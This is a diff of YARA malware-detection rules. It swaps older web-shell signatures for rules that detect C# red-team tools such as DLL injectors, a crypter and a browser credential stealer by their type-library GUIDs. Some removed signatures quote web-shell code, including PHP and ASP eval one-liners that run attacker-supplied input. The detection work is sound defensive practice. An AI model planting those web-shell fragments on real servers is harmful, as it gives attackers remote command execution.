-		2 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Mysql_Interface_V1_0
+rule SIGNATURE_BASE_HKTL_NET_GUID_Xoredreflectivedll : FILE
 {
 	meta:
-		description = "Web Shell - file Mysql interface v1.0.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L366-L379"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9b584bfb-98ef-50ee-b546-780c4b210a1b"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/r3nhat/XORedReflectiveDLL"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1546-L1560"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a12fc0a3d31e2f89727b9678148cd487"
-		logic_hash = "baa938c4cfd2c46b1752d866e186d76a04c353617d8ec3e0d78a3c546b120d13"
-		score = 70
+		logic_hash = "92df3b5c8d1b531dd4b4d04ba53aa6ae5ebf9d1f6869a0d46cd972b082fa1b9f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return"
+		$typelibguid0lo = "c0e49392-04e3-4abb-b931-5202e0eb4c73" ascii wide
+		$typelibguid1lo = "30eef7d6-cee8-490b-829f-082041bc3141" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Php_S_U
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharp_Suite : FILE
 {
 	meta:
-		description = "Web Shell - file s-u.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L380-L393"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ab3cf358-a41d-584d-baaf-5e8f7232ca85"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/FuzzySecurity/Sharp-Suite"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1562-L1596"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "efc7ba1a4023bcf40f5e912f1dd85b5a"
-		logic_hash = "3c6904fa475784e737275fd47eabea077bed57e920071c68fa09f7defecbdb72"
-		score = 70
-		quality = 85
-		tags = ""
+		logic_hash = "cffb4eae9fe3f2034fb03defcd0e0f3f1abaaa2638b137bdfdf67d071e055d42"
+		score = 75
+		quality = 83
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s6 = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea"
+		$typelibguid0lo = "19657be4-51ca-4a85-8ab1-f6666008b1f3" ascii wide
+		$typelibguid1lo = "0a382d9a-897f-431a-81c2-a4e08392c587" ascii wide
+		$typelibguid2lo = "467ee2a9-2f01-4a71-9647-2a2d9c31e608" ascii wide
+		$typelibguid3lo = "eacaa2b8-43e5-4888-826d-2f6902e16546" ascii wide
+		$typelibguid4lo = "629f86e6-44fe-4c9c-b043-1c9b64be6d5a" ascii wide
+		$typelibguid5lo = "ecf2ffe4-1744-4745-8693-5790d66bb1b8" ascii wide
+		$typelibguid6lo = "0a621f4c-8082-4c30-b131-ba2c98db0533" ascii wide
+		$typelibguid7lo = "72019dfe-608e-4ab2-a8f1-66c95c425620" ascii wide
+		$typelibguid8lo = "f0d28809-b712-4380-9a59-407b7b2badd5" ascii wide
+		$typelibguid9lo = "956a5a4d-2007-4857-9259-51cd0fb5312a" ascii wide
+		$typelibguid10lo = "a3b7c697-4bb6-455d-9fda-4ab54ae4c8d2" ascii wide
+		$typelibguid11lo = "a5f883ce-1f96-4456-bb35-40229191420c" ascii wide
+		$typelibguid12lo = "28978103-d90d-4618-b22e-222727f40313" ascii wide
+		$typelibguid13lo = "0c70c839-9565-4881-8ea1-408c1ebe38ce" ascii wide
+		$typelibguid14lo = "fa1d9a36-415a-4855-8c01-54b6e9fc6965" ascii wide
+		$typelibguid15lo = "252676f8-8a19-4664-bfb8-5a947e48c32a" ascii wide
+		$typelibguid16lo = "447edefc-b429-42bc-b3bc-63a9af19dbd6" ascii wide
+		$typelibguid17lo = "04d0b3a6-eaab-413d-b9e2-512fa8ebd02f" ascii wide
+		$typelibguid18lo = "5611236e-2557-45b8-be29-5d1f074d199e" ascii wide
+		$typelibguid19lo = "53f622eb-0ca3-4e9b-9dc8-30c832df1c7b" ascii wide
+		$typelibguid20lo = "414187db-5feb-43e5-a383-caa48b5395f1" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Phpshell_2_1_Config
+rule SIGNATURE_BASE_HKTL_NET_GUID_Rat_Shell : FILE
 {
 	meta:
-		description = "Web Shell - file config.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L394-L407"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8f206175-f7e4-5543-8059-24f102fcd4b9"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/stphivos/rat-shell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1598-L1612"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bd83144a649c5cc21ac41b505a36a8f3"
-		logic_hash = "51d16bcaef5f6795ebcd1154dca79d5cf5a389948b0e59f4939c30fef877e816"
-		score = 70
+		logic_hash = "3d88c891393c914b4b1520bbdb575e78740f21bd361fe4187fdd08aeed708540"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "; (choose good passwords!).  Add uses as simple 'username = \"password\"' lines." fullword
+		$typelibguid0lo = "7a15f8f6-6ce2-4ca4-919d-2056b70cc76a" ascii wide
+		$typelibguid1lo = "1659d65d-93a8-4bae-97d5-66d738fc6f6c" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_EFSO_2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dotnet_Gargoyle : FILE
 {
 	meta:
-		description = "Web Shell - file EFSO_2.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L408-L421"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "5efd0c83-cb65-5bda-b55e-4a89db5f337c"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/countercept/dotnet-gargoyle"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1614-L1629"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a341270f9ebd01320a7490c12cb2e64c"
-		logic_hash = "19bd00fabe0b4695129c180dd145e757e0b2c2a6dad751e8c889222c191e03ce"
-		score = 70
+		logic_hash = "c7ad2c6c775ed6355dd93b06e31e04916277564301b45fe13b69d3e25dcd7bad"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB"
+		$typelibguid0lo = "76435f79-f8af-4d74-8df5-d598a551b895" ascii wide
+		$typelibguid1lo = "5a3fc840-5432-4925-b5bc-abc536429cb5" ascii wide
+		$typelibguid2lo = "6f0bbb2a-e200-4d76-b8fa-f93c801ac220" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Up
+rule SIGNATURE_BASE_HKTL_NET_GUID_Aresskit : FILE
 {
 	meta:
-		description = "Web Shell - file up.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L422-L435"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8265cd84-c8e7-5654-9d3a-774dab52d938"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/BlackVikingPro/aresskit"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1631-L1644"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "515a5dd86fe48f673b72422cccf5a585"
-		logic_hash = "77c8121d000c45e44717689dec535fde7c9722005d1e4ff40d0b84abcf289f47"
-		score = 70
+		logic_hash = "3f7c2cb5dee0d77f70ea1fe231e498d1a16c11f92a8b930c9a603fa64a54cec0"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "// BUG: Corta el fichero si es mayor de 640Ks" fullword
+		$typelibguid0lo = "8dca0e42-f767-411d-9704-ae0ba4a44ae8" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Networkfilemanagerphp
+rule SIGNATURE_BASE_HKTL_NET_GUID_DLL_Injector : FILE
 {
 	meta:
-		description = "Web Shell - file NetworkFileManagerPHP.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L436-L449"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "301e70f4-89ed-539c-b7f3-9fc6ae1393b3"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/tmthrgd/DLL-Injector"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1646-L1660"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "acdbba993a5a4186fd864c5e4ea0ba4f"
-		logic_hash = "235e4062a9b9ebdf7dd0b8a2cb3b16ba7688a75b90d8c527344cf9605304838d"
-		score = 70
+		logic_hash = "fe92cb643d8ddbc0d8d09a88e90655965001375d05c799d6c2437e6c94b26c7a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "  echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted "
+		$typelibguid0lo = "4581a449-7d20-4c59-8da2-7fd830f1fd5e" ascii wide
+		$typelibguid1lo = "05f4b238-25ce-40dc-a890-d5bbb8642ee4" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Server_Variables
+rule SIGNATURE_BASE_HKTL_NET_GUID_Trufflesnout : FILE
 {
-	meta:
-		description = "Web Shell - file Server Variables.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L450-L464"
+	meta:
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "8135d39e-6a9e-567d-840f-8d8c6338cce1"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/dsnezhkov/TruffleSnout"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1662-L1675"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "47fb8a647e441488b30f92b4d39003d7"
-		logic_hash = "2a85301f1d6e4c457ff0a1b2a08eb6f054905993a0667087f37b9a7352e38911"
-		score = 70
+		logic_hash = "03b340ccf4b314ec5d3c33e83e5a47b55e935a8e55acbd6bd9daba43443d53a1"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s7 = "<% For Each Vars In Request.ServerVariables %>" fullword
-		$s9 = "Variable Name</B></font></p>" fullword
+		$typelibguid0lo = "33842d77-bce3-4ee8-9ee2-9769898bb429" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Caidao_Shell_Ice_2
+rule SIGNATURE_BASE_HKTL_NET_GUID_Anti_Analysis : FILE
 {
 	meta:
-		description = "Web Shell - file ice.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L465-L478"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bd527841-065e-57e9-b70e-c9d232072f1b"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/Anti-Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1677-L1690"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1d6335247f58e0a5b03e17977888f5f2"
-		logic_hash = "57c3c369abd826d676290300d8df2d890b777fa1f0e1156654062159a4228db7"
-		score = 70
+		logic_hash = "1a4141b376afbf36a7a9aa340ea5514b85dd6b0fab003554bae06c0240c98a79"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php ${${eval($_POST[ice])}};?>" fullword
+		$typelibguid0lo = "3092c8df-e9e4-4b75-b78e-f81a0058a635" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Caidao_Shell_Mdb
+rule SIGNATURE_BASE_HKTL_NET_GUID_Backnet : FILE
 {
 	meta:
-		description = "Web Shell - file mdb.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L479-L492"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "91824d18-f46b-5b95-b650-4d710d711cf9"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/valsov/BackNet"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1692-L1708"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fbf3847acef4844f3a0d04230f6b9ff9"
-		logic_hash = "89f7692acd754992f9379b9b4661a01d6ab95cb85a3c2699928aa5ed3a3ac8c5"
-		score = 70
+		logic_hash = "82ab970de2e27e711c502903cc2ede47da296df3ea346c870698c920a4ece282"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<% execute request(\"ice\")%>a " fullword
+		$typelibguid0lo = "9fdae122-cd1e-467d-a6fa-a98c26e76348" ascii wide
+		$typelibguid1lo = "243c279e-33a6-46a1-beab-2864cc7a499f" ascii wide
+		$typelibguid2lo = "a7301384-7354-47fd-a4c5-65b74e0bbb46" ascii wide
+		$typelibguid3lo = "982dc5b6-1123-428a-83dd-d212490c859f" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Guige
+rule SIGNATURE_BASE_HKTL_NET_GUID_Allthethings : FILE
 {
 	meta:
-		description = "Web Shell - file guige.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L493-L506"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c35160cb-ad31-5195-a7c6-0af91a58737d"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/johnjohnsp1/AllTheThings"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1710-L1723"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2c9f2dafa06332957127e2c713aacdd2"
-		logic_hash = "9d71095b5c709dfdd8b5fcebcaa4493d9c93e841e85cda2e2255e0c15ea83659"
-		score = 70
+		logic_hash = "a4a562e4db2477be34fa4ccf2c83afafc7aafead3a9eae434b4bc0a5ea6430f7"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null"
+		$typelibguid0lo = "0547ff40-5255-42a2-beb7-2ff0dbf7d3ba" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Phpspy2010
+rule SIGNATURE_BASE_HKTL_NET_GUID_Addreferencedotredteam : FILE
 {
 	meta:
-		description = "Web Shell - file phpspy2010.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L507-L522"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "59299a72-9b7a-5108-81c2-d8f6d2e99b20"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/ceramicskate0/AddReferenceDotRedTeam"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1725-L1738"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "14ae0e4f5349924a5047fed9f3b105c5"
-		logic_hash = "b3acef196b30cf9afe24c81860bedff69fc5652c514aa36aba85d16b12bcc432"
-		score = 70
+		logic_hash = "ec7e0c39db13d212ff9aac4ec8d7d9b4274f3a404997f9291dcbfeaf311f31b4"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "eval(gzinflate(base64_decode("
-		$s5 = "//angel" fullword
-		$s8 = "$admin['cookiedomain'] = '';" fullword
+		$typelibguid0lo = "73c79d7e-17d4-46c9-be5a-ecef65b924e4" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_Ice
+rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_Crypter : FILE
 {
 	meta:
-		description = "Web Shell - file ice.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L523-L536"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "484c7a15-7ab2-57d3-848c-0fddff753d52"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/Lime-Crypter"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1740-L1753"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d141e011a92f48da72728c35f1934a2b"
-		logic_hash = "524419e802d3cb6ac310565af22ec28044984aa4b1b2ee1cfbd292afd071709c"
-		score = 70
+		logic_hash = "ab4243f5e4efcadc9d1a9a34bdb4d5aedcf500accf4cb3681a73015c7f3f6900"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC"
+		$typelibguid0lo = "f93c99ed-28c9-48c5-bb90-dd98f18285a6" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Drag_System
+
+rule SIGNATURE_BASE_HKTL_NET_GUID_Browserghost : FILE
 {
 	meta:
-		description = "Web Shell - file system.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L537-L550"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "adcc5d12-c393-5708-ae0b-a85f2187c881"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/QAX-A-Team/BrowserGhost"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1755-L1770"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "15ae237cf395fb24cf12bff141fb3f7c"
-		logic_hash = "8ea8d9d64521f47f1396e4f4d6c8f4a71fa1a643799ec408e1d2e0f255dc4996"
-		score = 70
+		logic_hash = "448177aae4b0b2f17faefb22599649b7264c85e3af96b1d78bab6ada891b7a82"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_"
+		$typelibguid0lo = "2133c634-4139-466e-8983-9a23ec99e01b" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them and not pe.is_dll ( )
 }
-rule SIGNATURE_BASE_Webshell_Darkblade1_3_Asp_Indexx
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpshot : FILE
 {
 	meta:
-		description = "Web Shell - file indexx.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L551-L564"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9d59cd53-53b1-57db-b391-eee4dd6feec0"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/tothi/SharpShot"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1772-L1785"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b7f46693648f534c2ca78e3f21685707"
-		logic_hash = "57cfe09d53d42ee9d909a3894b8a3362209c1972c7d96ae5fdc61681c2998a89"
-		score = 70
+		logic_hash = "65bbe20eb2aac648648b828c176e418648ebdc6372d287e4bc3b0d3edf233e86"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou"
+		$typelibguid0lo = "057aef75-861b-4e4b-a372-cfbd8322c8e1" ascii wide
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Webshell_Phpshell3
+rule SIGNATURE_BASE_HKTL_NET_GUID_Offensive__NET : FILE
 {
 	meta:
-		description = "Web Shell - file phpshell3.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
-		modified = "2025-11-03"
-		reference = "https://github.com/Neo23x0/signature-base"
